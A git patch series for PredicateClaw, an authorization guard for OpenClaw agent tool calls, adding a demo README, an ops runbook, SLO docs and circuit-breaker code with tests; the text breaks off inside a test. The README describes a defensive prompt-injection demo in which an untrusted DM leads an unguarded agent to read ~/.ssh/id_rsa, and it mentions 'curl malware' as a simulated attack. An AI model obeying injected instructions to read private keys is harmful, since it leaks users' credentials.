From 698841fefbfc7393354ea261063ec4d9d935fe27 Mon Sep 17 00:00:00 2001 From: SentienceDEV Date: Fri, 20 Feb 2026 17:14:56 -0800 Subject: [PATCH 1/2] demo setup guide in examples/readme --- examples/HACK_VS_FIX_DEMO.md | 41 ------------ examples/README.md | 121 +++++++++++++++++++++++++++++++++++ 2 files changed, 121 insertions(+), 41 deletions(-) delete mode 100644 examples/HACK_VS_FIX_DEMO.md create mode 100644 examples/README.md diff --git a/examples/HACK_VS_FIX_DEMO.md b/examples/HACK_VS_FIX_DEMO.md deleted file mode 100644 index 2843c29..0000000 --- a/examples/HACK_VS_FIX_DEMO.md +++ /dev/null @@ -1,41 +0,0 @@ -# Hack vs Fix Demo Playbook - -This demo shows the OpenClaw prompt-injection risk path and the -`openclaw-predicate-provider` protection path. - -## Goal - -Demonstrate that: - -1. an unguarded tool call can read a sensitive file when prompted from an - untrusted source, and -2. the Predicate-guarded path blocks the same action with deterministic policy. - -## Fast local run - -From `openclaw-predicate-provider/`: - -```bash -npm test -- tests/hack-vs-fix-demo.test.ts -``` - -Expected: - -- test passes, -- unguarded branch returns sensitive payload string, -- guarded branch throws `ActionDeniedError` with deny reason - `deny_sensitive_read_from_untrusted_context`. - -## Scenario in plain language - -- **Hack path:** injected context (`source: untrusted_dm`) attempts - `fs.read` on `~/.ssh/id_rsa` and succeeds when unguarded. -- **Fix path:** same action goes through `GuardedProvider + ToolAdapter`, - maps to Predicate action/resource contract, and receives deny decision. - -## Video recording checklist (for launch asset) - -1. Show baseline unguarded action succeeds for sensitive read. -2. Show guarded provider enabled with identical prompt/context. -3. Show deny result and user-facing blocked message. -4. Show test command and green output as reproducible evidence. 
diff --git a/examples/README.md b/examples/README.md new file mode 100644 index 0000000..18aafe8 --- /dev/null +++ b/examples/README.md @@ -0,0 +1,121 @@ +# OpenClaw Predicate Provider Examples + +This directory contains examples and test harnesses for the OpenClaw Predicate Provider. + +## Hack vs Fix Demo + +This demo shows the OpenClaw prompt-injection risk path and the +`PredicateClaw` protection path. + +### Goal + +Demonstrate that: + +1. An unguarded tool call can read a sensitive file when prompted from an + untrusted source, and +2. The Predicate-guarded path blocks the same action with deterministic policy. + +### Scenario in Plain Language + +- **Hack path:** Injected context (`source: untrusted_dm`) attempts + `fs.read` on `~/.ssh/id_rsa` and succeeds when unguarded. +- **Fix path:** Same action goes through `GuardedProvider + ToolAdapter`, + maps to Predicate action/resource contract, and receives deny decision. + +### Fast Local Run + +From `PredicateClaw/`: + +```bash +npm test -- tests/hack-vs-fix-demo.test.ts +``` + +Expected: + +- Test passes +- Unguarded branch returns sensitive payload string +- Guarded branch throws `ActionDeniedError` with deny reason + `deny_sensitive_read_from_untrusted_context` + +## Docker Adversarial Testing + +### Why Docker? + +Running adversarial tests (simulating prompt injection attacks like "read my +SSH keys" or "curl malware") directly on your machine is risky. If the provider +has a bug, the attack could execute. Docker isolates failures to the container. 
+ +### Quick Start + +From the `PredicateClaw/` directory: + +**Option 1: Docker Compose (recommended)** + +```bash +# Run the "Hack vs Fix" demo test +docker compose -f examples/docker/docker-compose.test.yml run --rm provider-demo + +# Run full CI checks (typecheck + all tests) +docker compose -f examples/docker/docker-compose.test.yml run --rm provider-ci +``` + +**Option 2: Build and run directly** + +```bash +# Build the test image +docker build -t openclaw-provider-test -f examples/docker/Dockerfile.test . + +# Run demo test +docker run --rm -it openclaw-provider-test npm run test:demo + +# Run full CI +docker run --rm -it openclaw-provider-test npm run test:ci +``` + +### Expected Output + +``` + RUN v4.x.x /app + + ✓ tests/hack-vs-fix-demo.test.ts (1 test) + ✓ shows unguarded exfil path and guarded deny path + + Test Files 1 passed (1) + Tests 1 passed (1) +``` + +The test verifies: + +- Unguarded call returns sensitive data +- Guarded call throws `ActionDeniedError` +- Deny reason is stable and auditable + +### Testing with a Live Sidecar + +To test against a real `predicate-authorityd` sidecar (not mocked): + +```bash +# Start sidecar on host +predicate-authorityd --port 9090 + +# Run container with host network access +docker run --rm -it --network=host openclaw-provider-test npm test +``` + +The `--network=host` flag lets the container reach `localhost:9090` where your +sidecar runs. + +## Video Recording Checklist (for Launch Asset) + +1. Show baseline unguarded action succeeds for sensitive read. +2. Show guarded provider enabled with identical prompt/context. +3. Show deny result and user-facing blocked message. +4. Show test command and green output as reproducible evidence. 
+ +## Other Examples + +- `openclaw_integration_example.py` - Python integration example +- `runtime_registry_example.py` - Runtime registration example +- `openclaw-plugin-smoke/` - OpenClaw plugin smoke test +- `policy/` - Example policy files +- `docker/` - Docker test harness files From 5667cbd6b2f283ad099821b53bb554eb9b28d8f8 Mon Sep 17 00:00:00 2001 From: SentienceDEV Date: Fri, 20 Feb 2026 17:33:47 -0800 Subject: [PATCH 2/2] Phase 3: Hardening IdP alignment, and SLOs --- docs/OPERATIONAL_RUNBOOK.md | 389 ++++++++++++++++++++++++++++++++++ docs/SLO_THRESHOLDS.md | 193 +++++++++++++++++ src/circuit-breaker.ts | 245 +++++++++++++++++++++ src/index.ts | 1 + tests/circuit-breaker.test.ts | 266 +++++++++++++++++++++++ tests/jwks-rotation.test.ts | 274 ++++++++++++++++++++++++ tests/load-latency.test.ts | 214 +++++++++++++++++++ 7 files changed, 1582 insertions(+) create mode 100644 docs/OPERATIONAL_RUNBOOK.md create mode 100644 docs/SLO_THRESHOLDS.md create mode 100644 src/circuit-breaker.ts create mode 100644 tests/circuit-breaker.test.ts create mode 100644 tests/jwks-rotation.test.ts create mode 100644 tests/load-latency.test.ts diff --git a/docs/OPERATIONAL_RUNBOOK.md b/docs/OPERATIONAL_RUNBOOK.md new file mode 100644 index 0000000..3cf6fc2 --- /dev/null +++ b/docs/OPERATIONAL_RUNBOOK.md @@ -0,0 +1,389 @@ +# Operational Runbook + +This runbook provides step-by-step procedures for operating and troubleshooting +the OpenClaw Predicate Provider in production environments. 
+ +## Quick Reference + +| Incident Type | Severity | First Response | +|---------------|----------|----------------| +| Circuit breaker open | P1 | Check sidecar health | +| Elevated deny rate | P2 | Compare to policy changes | +| High latency | P3 | Check sidecar resources | +| Audit export failures | P4 | Check control plane connectivity | + +## Prerequisites + +Before using this runbook, ensure you have: + +- Access to provider logs and metrics dashboards +- Access to sidecar logs (`predicate-authorityd`) +- Ability to restart provider/sidecar processes +- Contact information for on-call escalation + +## Incident Response Procedures + +### P1: Circuit Breaker Stuck Open + +**Symptoms:** +- All authorization requests failing immediately +- `CircuitOpenError` in provider logs +- Metrics showing `predicate_circuit_state = open` + +**Diagnosis Steps:** + +1. **Check sidecar health** + ```bash + curl -s http://localhost:8787/health | jq . + ``` + Expected: `{"status": "healthy"}` + +2. **Check sidecar logs for errors** + ```bash + journalctl -u predicate-authorityd -n 100 --no-pager + # or + docker logs predicate-authorityd --tail 100 + ``` + +3. **Verify network connectivity** + ```bash + curl -w "connect: %{time_connect}s total: %{time_total}s\n" -s -o /dev/null http://localhost:8787/health + ``` + +4. **Check control plane sync status** + ```bash + curl -s http://localhost:8787/v1/sync/status | jq . + ``` + +**Resolution Steps:** + +1. **If sidecar is unhealthy:** + ```bash + # Restart sidecar + systemctl restart predicate-authorityd + # or + docker restart predicate-authorityd + ``` + +2. **If sidecar is healthy but circuit is still open:** + - Circuit moves to half-open once `resetTimeoutMs` (default: 30s) has passed since the last failure, then closes after `successThreshold` (default: 2) successful calls + - For immediate recovery, restart the provider process + +3. 
**If control plane sync is failing:** + - Check control plane endpoint accessibility + - Verify API credentials are valid + - Check for control plane service incidents + +**Escalation:** +- If not resolved in 5 minutes, page on-call engineer +- If sidecar restart doesn't help, escalate to platform team + +--- + +### P2: Elevated Deny Rate + +**Symptoms:** +- Sudden increase in deny decisions (>2x baseline) +- User reports of blocked actions +- `denied_by_policy` reason code spike + +**Diagnosis Steps:** + +1. **Check deny rate trend** + ```bash + # Query recent deny events + curl -s "http://localhost:8787/v1/audit/decisions?outcome=deny&limit=50" | jq . + ``` + +2. **Compare to recent policy changes** + - Check control plane for recent policy deployments + - Review policy version in metrics + +3. **Identify affected actions/resources** + ```bash + # Group denials by action + curl -s "http://localhost:8787/v1/audit/decisions?outcome=deny" | \ + jq -r '.items | group_by(.action) | map({action: .[0].action, count: length})' + ``` + +4. **Check for attack patterns** + - Look for repeated denials from same principal + - Check for unusual resource patterns (path traversal, etc.) + +**Resolution Steps:** + +1. **If caused by policy change:** + - Rollback to previous policy version via control plane + - Or fix policy and redeploy + +2. **If attack attempt:** + - Document attack patterns + - Consider adding rate limiting + - Report to security team + +3. **If false positives:** + - Review policy rules for overly broad denials + - Add specific allow rules for legitimate use cases + +**Escalation:** +- If attack suspected, notify security team immediately +- If policy rollback needed, coordinate with policy owners + +--- + +### P3: High Authorization Latency + +**Symptoms:** +- p95 latency > 150ms +- Slow tool execution reported by users +- Timeout errors in logs + +**Diagnosis Steps:** + +1. 
**Check current latency percentiles** + ```bash + curl -s http://localhost:8787/metrics | grep predicate_auth_latency + ``` + +2. **Check sidecar resource usage** + ```bash + # CPU and memory + top -p $(pgrep predicate-authorityd) + # or + docker stats predicate-authorityd --no-stream + ``` + +3. **Check control plane sync load** + ```bash + curl -s http://localhost:8787/v1/sync/status | jq '.last_sync_duration_ms' + ``` + +4. **Check concurrent request volume** + ```bash + curl -s http://localhost:8787/metrics | grep predicate_auth_concurrent + ``` + +**Resolution Steps:** + +1. **If sidecar CPU is high:** + - Check for runaway policy evaluation + - Consider scaling sidecar resources + - Review policy complexity + +2. **If sync is slow:** + - Check control plane latency + - Consider increasing sync interval + - Review policy size + +3. **If high concurrent load:** + - Consider horizontal scaling + - Review request batching options + - Check for retry storms + +**Escalation:** +- If resources are maxed, request capacity increase +- If policy is too complex, work with policy team to optimize + +--- + +### P4: Audit Export Failures + +**Symptoms:** +- Missing audit events in control plane +- `audit_export_failure` in logs +- Non-zero `predicate_audit_failures` counter + +**Diagnosis Steps:** + +1. **Check export error logs** + ```bash + grep -E "audit.*(error|failure)" /var/log/openclaw-provider/provider.log | tail -20 + ``` + +2. **Verify control plane connectivity** + ```bash + curl -s https://control-plane.example.com/health + ``` + +3. **Check export queue depth** + ```bash + curl -s http://localhost:8787/metrics | grep predicate_audit_queue + ``` + +**Resolution Steps:** + +1. **If control plane unreachable:** + - Check network/firewall rules + - Verify TLS certificates + - Check for control plane incidents + +2. **If queue is backed up:** + - Audit export is best-effort; auth continues working + - Events will retry automatically + - Check disk space for local buffer + +3. 
**If credentials expired:** + - Rotate API credentials + - Update provider configuration + - Restart provider + +**Escalation:** +- Audit failures are P4 (non-blocking) +- Escalate only if prolonged (>1 hour) or compliance-critical + +--- + +## Routine Operations + +### Restarting the Provider + +```bash +# Graceful restart (allows in-flight requests to complete) +systemctl reload openclaw-provider + +# Full restart +systemctl restart openclaw-provider +``` + +### Rotating Credentials + +1. Generate new credentials in control plane +2. Update provider configuration +3. Restart provider +4. Verify connectivity +5. Revoke old credentials + +### Updating Policy + +1. Deploy new policy to control plane +2. Monitor sync status on sidecars +3. Watch deny rate for anomalies +4. Rollback if issues detected + +### Scaling Sidecars + +For high-load environments: + +1. Deploy additional sidecar instances +2. Configure load balancer +3. Update provider `baseUrl` to load balancer +4. Verify even distribution + +--- + +## Health Checks + +### Provider Health + +```bash +# Local provider health +curl -s http://localhost:3000/health + +# Expected response +{ + "status": "healthy", + "sidecar": "connected", + "circuit": "closed" +} +``` + +### Sidecar Health + +```bash +# Sidecar health +curl -s http://localhost:8787/health + +# Expected response +{ + "status": "healthy", + "policy_version": "v1.2.3", + "last_sync": "2026-02-20T12:00:00Z" +} +``` + +### End-to-End Check + +```bash +# Test authorization flow +curl -X POST http://localhost:8787/v1/authorize \ + -H "Content-Type: application/json" \ + -d '{ + "principal": "test:health-check", + "action": "health.check", + "resource": "system" + }' + +# Expected: allow decision for health check action +``` + +--- + +## Monitoring Checklist + +### Daily + +- [ ] Review deny rate trends +- [ ] Check circuit breaker state +- [ ] Verify audit export completeness + +### Weekly + +- [ ] Review latency percentiles +- [ ] Check policy sync 
freshness +- [ ] Audit access logs + +### Monthly + +- [ ] Review and update SLO thresholds +- [ ] Test incident response procedures +- [ ] Update runbook with learnings + +--- + +## Contact Information + +| Role | Contact | +|------|---------| +| On-call engineer | PagerDuty: `predicate-oncall` | +| Platform team | Slack: `#predicate-platform` | +| Security team | Slack: `#security-incidents` | +| Control plane status | https://status.predicatesystems.ai | + +--- + +## Appendix + +### Useful Commands + +```bash +# View real-time logs +journalctl -u predicate-authorityd -f + +# Check process status +systemctl status predicate-authorityd + +# View metrics +curl -s http://localhost:8787/metrics + +# Force policy sync +curl -X POST http://localhost:8787/v1/sync/trigger + +# Get current policy version +curl -s http://localhost:8787/v1/policy/version +``` + +### Log Locations + +| Component | Log Path | +|-----------|----------| +| Provider | `/var/log/openclaw-provider/provider.log` | +| Sidecar | `/var/log/predicate-authorityd/sidecar.log` | +| Audit events | `/var/log/predicate-authorityd/audit.jsonl` | + +### Configuration Files + +| Component | Config Path | +|-----------|-------------| +| Provider | `/etc/openclaw-provider/config.yaml` | +| Sidecar | `/etc/predicate-authorityd/config.yaml` | +| Policy | Managed via control plane | diff --git a/docs/SLO_THRESHOLDS.md b/docs/SLO_THRESHOLDS.md new file mode 100644 index 0000000..a3f48f9 --- /dev/null +++ b/docs/SLO_THRESHOLDS.md @@ -0,0 +1,193 @@ +# SLOs and Alert Thresholds + +This document defines Service Level Objectives (SLOs) and alert thresholds for +the OpenClaw Predicate Provider in production deployments. + +## Latency SLOs + +### Authorization Call Latency + +| Percentile | Target | Alert Threshold | +|------------|--------|-----------------| +| p50 | < 25 ms | > 50 ms | +| p95 | < 75 ms | > 150 ms | +| p99 | < 150 ms | > 300 ms | + +These targets assume local sidecar deployment. 
For remote sidecar deployments, +add network RTT to each target. + +### Sidecar Timeout + +- **Default timeout:** 300 ms +- **Hard timeout (fail-closed):** 500 ms + +If the sidecar does not respond within the timeout, the provider fails closed +(denies the action) for high-risk operations. + +## Availability SLOs + +### Provider Availability + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Uptime | 99.9% | < 99.5% | +| Error rate | < 0.1% | > 1% | + +### Sidecar Availability + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Uptime | 99.95% | < 99.9% | +| Circuit breaker open rate | < 0.5% | > 2% | + +## Decision Quality SLOs + +### Deny Spike Detection + +| Metric | Baseline | Alert Threshold | +|--------|----------|-----------------| +| Deny rate | ~5% (varies by policy) | > 2x baseline over 5 min | +| Deny rate spike | N/A | > 50% increase in 1 min | + +A sudden spike in deny rates may indicate: +- Misconfigured policy rollout +- Attack attempt (should trigger investigation) +- Sidecar sync failure + +### Reason Code Distribution + +Monitor reason code distribution for anomalies: + +| Reason Code | Expected Range | Alert if | +|-------------|----------------|----------| +| `denied_by_policy` | 80-95% of denials | < 70% | +| `sidecar_timeout` | < 1% | > 5% | +| `circuit_open` | < 0.5% | > 2% | +| `missing_context` | < 0.1% | > 1% | + +## Circuit Breaker Thresholds + +### Default Configuration + +```typescript +{ + failureThreshold: 5, // Opens after 5 consecutive failures + resetTimeoutMs: 30_000, // Attempts recovery after 30 seconds + successThreshold: 2, // Closes after 2 successful calls in half-open +} +``` + +### Alert Thresholds + +| Event | Alert Level | Action | +|-------|-------------|--------| +| Circuit opened | Warning | Investigate sidecar health | +| Circuit open > 1 min | Critical | Page on-call | +| Circuit open > 5 min | Critical | Consider manual intervention | + +## Telemetry 
and Audit SLOs + +### Audit Export Latency + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Export delay (best-effort) | < 5 seconds | > 30 seconds | +| Export failure rate | < 1% | > 5% | + +Note: Audit export is best-effort and should never block the authorization path. + +### Telemetry Completeness + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Decision events captured | > 99.9% | < 99% | +| Context fields present | > 99% | < 95% | + +## Control Plane Sync SLOs + +### Policy Sync + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Sync interval | < 60 seconds | > 5 minutes | +| Stale policy age | < 5 minutes | > 15 minutes | + +### Revocation Propagation + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Revocation latency | < 30 seconds | > 2 minutes | +| Revocation completeness | 100% | Any missed revocation | + +## Monitoring Implementation + +### Required Metrics + +```typescript +// Authorization metrics +counter("predicate_auth_total", { outcome: "allow" | "deny" | "error" }); +histogram("predicate_auth_latency_ms", { action: string }); + +// Circuit breaker metrics +gauge("predicate_circuit_state", { state: "closed" | "open" | "half_open" }); +counter("predicate_circuit_transitions", { from: string, to: string }); + +// Sync metrics +gauge("predicate_policy_age_seconds"); +counter("predicate_sync_failures"); + +// Audit metrics +counter("predicate_audit_exports", { status: "success" | "failure" }); +histogram("predicate_audit_latency_ms"); +``` + +### Dashboard Panels + +1. **Authorization Overview** + - Request rate by action + - Allow/deny/error distribution + - p50/p95/p99 latency + +2. **Circuit Breaker Status** + - Current state per sidecar + - Transition history + - Recovery time + +3. **Sync Health** + - Policy version timeline + - Sync lag + - Revocation propagation + +4. 
**Deny Analysis** + - Deny rate over time + - Top deny reasons + - Deny by tenant/action + +## Incident Response + +### P1: Circuit Breaker Stuck Open + +1. Check sidecar health and logs +2. Verify network connectivity +3. Check control plane status +4. Consider manual circuit reset if sidecar is healthy + +### P2: Elevated Deny Rate + +1. Compare to policy change timeline +2. Check for attack patterns +3. Review deny reasons distribution +4. Validate policy sync status + +### P3: Elevated Latency + +1. Check sidecar resource usage +2. Review concurrent request load +3. Check control plane sync load +4. Consider scaling sidecars + +## Review Cadence + +- **Weekly:** Review latency percentiles and deny trends +- **Monthly:** Audit SLO compliance and adjust thresholds +- **Quarterly:** Review and update SLO targets based on operational learnings diff --git a/src/circuit-breaker.ts b/src/circuit-breaker.ts new file mode 100644 index 0000000..92e5d5a --- /dev/null +++ b/src/circuit-breaker.ts @@ -0,0 +1,245 @@ +/** + * Circuit breaker for sidecar outage resilience. 
+ * + * States: + * - CLOSED: Normal operation, requests pass through + * - OPEN: Too many failures, requests fail fast without calling sidecar + * - HALF_OPEN: Testing if sidecar has recovered + */ + +export type CircuitState = "closed" | "open" | "half_open"; + +export interface CircuitBreakerConfig { + /** Number of failures before opening the circuit */ + failureThreshold: number; + /** Time in ms before attempting recovery (half-open state) */ + resetTimeoutMs: number; + /** Number of successful calls in half-open to close circuit */ + successThreshold: number; + /** Optional callback when state changes */ + onStateChange?: (from: CircuitState, to: CircuitState) => void; +} + +export const defaultCircuitBreakerConfig: CircuitBreakerConfig = { + failureThreshold: 5, + resetTimeoutMs: 30_000, + successThreshold: 2, +}; + +export interface CircuitBreakerMetrics { + state: CircuitState; + failureCount: number; + successCount: number; + lastFailureTime: number | null; + totalFailures: number; + totalSuccesses: number; + totalRejections: number; +} + +export class CircuitBreaker { + private state: CircuitState = "closed"; + private failureCount = 0; + private successCount = 0; + private lastFailureTime: number | null = null; + private totalFailures = 0; + private totalSuccesses = 0; + private totalRejections = 0; + + constructor(private readonly config: CircuitBreakerConfig) {} + + getMetrics(): CircuitBreakerMetrics { + return { + state: this.state, + failureCount: this.failureCount, + successCount: this.successCount, + lastFailureTime: this.lastFailureTime, + totalFailures: this.totalFailures, + totalSuccesses: this.totalSuccesses, + totalRejections: this.totalRejections, + }; + } + + getState(): CircuitState { + return this.state; + } + + /** + * Check if request should be allowed through. + * Returns true if allowed, false if circuit is open. 
+ */ + allowRequest(): boolean { + if (this.state === "closed") { + return true; + } + + if (this.state === "open") { + const now = Date.now(); + if ( + this.lastFailureTime !== null && + now - this.lastFailureTime >= this.config.resetTimeoutMs + ) { + this.transitionTo("half_open"); + return true; + } + this.totalRejections++; + return false; + } + + // half_open: allow limited requests to test recovery + return true; + } + + /** + * Record a successful call. + */ + recordSuccess(): void { + this.totalSuccesses++; + + if (this.state === "half_open") { + this.successCount++; + if (this.successCount >= this.config.successThreshold) { + this.transitionTo("closed"); + } + } else if (this.state === "closed") { + // Reset failure count on success + this.failureCount = 0; + } + } + + /** + * Record a failed call. + */ + recordFailure(): void { + this.totalFailures++; + this.lastFailureTime = Date.now(); + + if (this.state === "half_open") { + // Any failure in half-open reopens the circuit + this.transitionTo("open"); + return; + } + + if (this.state === "closed") { + this.failureCount++; + if (this.failureCount >= this.config.failureThreshold) { + this.transitionTo("open"); + } + } + } + + /** + * Force reset to closed state (e.g., for testing or manual recovery). + */ + reset(): void { + this.transitionTo("closed"); + } + + private transitionTo(newState: CircuitState): void { + if (this.state === newState) return; + + const oldState = this.state; + this.state = newState; + + // Reset counters on state change + if (newState === "closed") { + this.failureCount = 0; + this.successCount = 0; + } else if (newState === "half_open") { + this.successCount = 0; + } else if (newState === "open") { + this.successCount = 0; + } + + this.config.onStateChange?.(oldState, newState); + } +} + +/** + * Exponential backoff calculator with jitter. 
+ */ +export interface BackoffConfig { + initialMs: number; + maxMs: number; + multiplier: number; + jitterFactor: number; +} + +export const defaultBackoffConfig: BackoffConfig = { + initialMs: 100, + maxMs: 10_000, + multiplier: 2, + jitterFactor: 0.1, +}; + +export function calculateBackoff( + attempt: number, + config: BackoffConfig = defaultBackoffConfig, +): number { + const base = Math.min( + config.initialMs * Math.pow(config.multiplier, attempt), + config.maxMs, + ); + const jitter = base * config.jitterFactor * (Math.random() * 2 - 1); + return Math.max(0, Math.round(base + jitter)); +} + +/** + * Sleep for a given number of milliseconds. + */ +export function sleep(ms: number): Promise { + return new Promise((resolve) => setTimeout(resolve, ms)); +} + +/** + * Wrap an async function with circuit breaker and retry logic. + */ +export async function withCircuitBreaker( + breaker: CircuitBreaker, + fn: () => Promise, + options?: { + maxRetries?: number; + backoffConfig?: BackoffConfig; + isFailure?: (error: unknown) => boolean; + }, +): Promise { + const maxRetries = options?.maxRetries ?? 0; + const backoffConfig = options?.backoffConfig ?? defaultBackoffConfig; + const isFailure = options?.isFailure ?? 
(() => true); + + if (!breaker.allowRequest()) { + throw new CircuitOpenError("Circuit breaker is open"); + } + + let lastError: unknown; + + for (let attempt = 0; attempt <= maxRetries; attempt++) { + try { + const result = await fn(); + breaker.recordSuccess(); + return result; + } catch (error) { + lastError = error; + + if (!isFailure(error)) { + // Not a circuit-breaker-relevant failure (e.g., business logic error) + throw error; + } + + breaker.recordFailure(); + + if (attempt < maxRetries && breaker.allowRequest()) { + const delay = calculateBackoff(attempt, backoffConfig); + await sleep(delay); + } + } + } + + throw lastError; +} + +export class CircuitOpenError extends Error { + constructor(message: string) { + super(message); + this.name = "CircuitOpenError"; + } +} diff --git a/src/index.ts b/src/index.ts index 4934646..12453dd 100644 --- a/src/index.ts +++ b/src/index.ts @@ -1,5 +1,6 @@ export * from "./adapter.js"; export * from "./authority-client.js"; +export * from "./circuit-breaker.js"; export * from "./config.js"; export * from "./control-plane-sync.js"; export * from "./errors.js"; diff --git a/tests/circuit-breaker.test.ts b/tests/circuit-breaker.test.ts new file mode 100644 index 0000000..b4fe59a --- /dev/null +++ b/tests/circuit-breaker.test.ts @@ -0,0 +1,266 @@ +import { describe, expect, it, vi } from "vitest"; +import { + calculateBackoff, + CircuitBreaker, + CircuitOpenError, + defaultBackoffConfig, + defaultCircuitBreakerConfig, + withCircuitBreaker, + type CircuitState, +} from "../src/circuit-breaker.js"; + +describe("CircuitBreaker", () => { + it("starts in closed state", () => { + const breaker = new CircuitBreaker(defaultCircuitBreakerConfig); + expect(breaker.getState()).toBe("closed"); + expect(breaker.allowRequest()).toBe(true); + }); + + it("opens after reaching failure threshold", () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 3, + }); + + breaker.recordFailure(); + 
expect(breaker.getState()).toBe("closed");
+
+    breaker.recordFailure();
+    expect(breaker.getState()).toBe("closed");
+
+    breaker.recordFailure();
+    expect(breaker.getState()).toBe("open");
+    expect(breaker.allowRequest()).toBe(false);
+  });
+
+  it("transitions to half-open after reset timeout", async () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 1,
+      resetTimeoutMs: 50,
+    });
+
+    breaker.recordFailure();
+    expect(breaker.getState()).toBe("open");
+    expect(breaker.allowRequest()).toBe(false);
+
+    // Sleep 60ms, just past the 50ms resetTimeoutMs configured above
+    await new Promise((r) => setTimeout(r, 60));
+
+    expect(breaker.allowRequest()).toBe(true);
+    expect(breaker.getState()).toBe("half_open");
+  });
+
+  it("closes after success threshold in half-open", async () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 1,
+      resetTimeoutMs: 10,
+      successThreshold: 2,
+    });
+
+    breaker.recordFailure();
+    expect(breaker.getState()).toBe("open");
+
+    await new Promise((r) => setTimeout(r, 15)); // just past the 10ms resetTimeoutMs
+    breaker.allowRequest(); // First request after the timeout triggers half-open
+
+    expect(breaker.getState()).toBe("half_open");
+
+    breaker.recordSuccess();
+    expect(breaker.getState()).toBe("half_open"); // 1 of successThreshold (2) successes so far
+
+    breaker.recordSuccess();
+    expect(breaker.getState()).toBe("closed");
+  });
+
+  it("reopens on failure in half-open state", async () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 1,
+      resetTimeoutMs: 10,
+    });
+
+    breaker.recordFailure();
+    await new Promise((r) => setTimeout(r, 15)); // just past the 10ms resetTimeoutMs
+    breaker.allowRequest(); // moves the breaker to half-open (asserted on the next line)
+
+    expect(breaker.getState()).toBe("half_open");
+
+    breaker.recordFailure();
+    expect(breaker.getState()).toBe("open");
+  });
+
+  it("resets failure count on success in closed state", () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 3,
+    });
+
+    breaker.recordFailure();
+    breaker.recordFailure();
+    breaker.recordSuccess();
+    breaker.recordFailure();
+    breaker.recordFailure();
+
+    // Still closed: the success reset the count, so only 2 of the 3 allowed failures are pending
+    expect(breaker.getState()).toBe("closed");
+  });
+
+  it("tracks metrics correctly", () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 2,
+    });
+
+    breaker.recordSuccess();
+    breaker.recordSuccess();
+    breaker.recordFailure();
+    breaker.recordFailure();
+    breaker.allowRequest(); // Circuit is open after 2 failures, so this is rejected and counted in totalRejections
+
+    const metrics = breaker.getMetrics();
+    expect(metrics.totalSuccesses).toBe(2);
+    expect(metrics.totalFailures).toBe(2);
+    expect(metrics.totalRejections).toBe(1);
+    expect(metrics.state).toBe("open");
+  });
+
+  it("calls onStateChange callback", () => {
+    const stateChanges: Array<{ from: CircuitState; to: CircuitState }> = [];
+
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 1,
+      onStateChange: (from, to) => stateChanges.push({ from, to }),
+    });
+
+    breaker.recordFailure();
+    expect(stateChanges).toHaveLength(1);
+    expect(stateChanges[0]).toEqual({ from: "closed", to: "open" });
+  });
+
+  it("can be manually reset", () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 1,
+    });
+
+    breaker.recordFailure();
+    expect(breaker.getState()).toBe("open");
+
+    breaker.reset();
+    expect(breaker.getState()).toBe("closed");
+    expect(breaker.allowRequest()).toBe(true);
+  });
+});
+
+describe("calculateBackoff", () => {
+  it("calculates exponential backoff", () => {
+    const config = { ...defaultBackoffConfig, jitterFactor: 0 }; // no jitter, so exact delays can be asserted
+
+    expect(calculateBackoff(0, config)).toBe(100); // presumably defaultBackoffConfig.initialMs is 100 - confirm
+    expect(calculateBackoff(1, config)).toBe(200);
+    expect(calculateBackoff(2, config)).toBe(400);
+    expect(calculateBackoff(3, config)).toBe(800);
+  });
+
+  it("respects max backoff", () => {
+    const config = { ...defaultBackoffConfig, jitterFactor: 0, maxMs: 500 };
+
+    expect(calculateBackoff(0, config)).toBe(100);
+    expect(calculateBackoff(1, config)).toBe(200);
+    expect(calculateBackoff(2, config)).toBe(400);
+    expect(calculateBackoff(3, config)).toBe(500); // Capped at maxMs (uncapped value would be 800)
+    expect(calculateBackoff(10, config)).toBe(500);
+  });
+
+  it("adds jitter within bounds", () => {
+    const config = { ...defaultBackoffConfig, jitterFactor: 0.5 };
+    const results = new Set();
+
+    for (let i = 0; i < 20; i++) {
+      results.add(calculateBackoff(0, config));
+    }
+
+    // With jitter, the 20 samples should not all be identical
+    expect(results.size).toBeGreaterThan(1);
+
+    // All results should be within expected range (100 +/- 50)
+    for (const result of results) {
+      expect(result).toBeGreaterThanOrEqual(50);
+      expect(result).toBeLessThanOrEqual(150);
+    }
+  });
+});
+
+describe("withCircuitBreaker", () => {
+  it("executes function and records success", async () => {
+    const breaker = new CircuitBreaker(defaultCircuitBreakerConfig);
+    const fn = vi.fn().mockResolvedValue("result");
+
+    const result = await withCircuitBreaker(breaker, fn);
+
+    expect(result).toBe("result");
+    expect(fn).toHaveBeenCalledTimes(1);
+    expect(breaker.getMetrics().totalSuccesses).toBe(1);
+  });
+
+  it("throws CircuitOpenError when circuit is open", async () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 1,
+    });
+
+    breaker.recordFailure();
+    expect(breaker.getState()).toBe("open");
+
+    const fn = vi.fn().mockResolvedValue("result");
+
+    await expect(withCircuitBreaker(breaker, fn)).rejects.toThrow(
+      CircuitOpenError,
+    );
+    expect(fn).not.toHaveBeenCalled();
+  });
+
+  it("retries with backoff on failure", async () => {
+    const breaker = new CircuitBreaker({
+      ...defaultCircuitBreakerConfig,
+      failureThreshold: 10, // well above the 2 failures injected below
+    });
+
+    let attempts = 0;
+    const fn = vi.fn().mockImplementation(() => {
+      attempts++;
+      if (attempts < 3) { // first two calls reject; the third resolves
+        return Promise.reject(new Error("fail"));
+      }
+      return Promise.resolve("success");
+    });
+
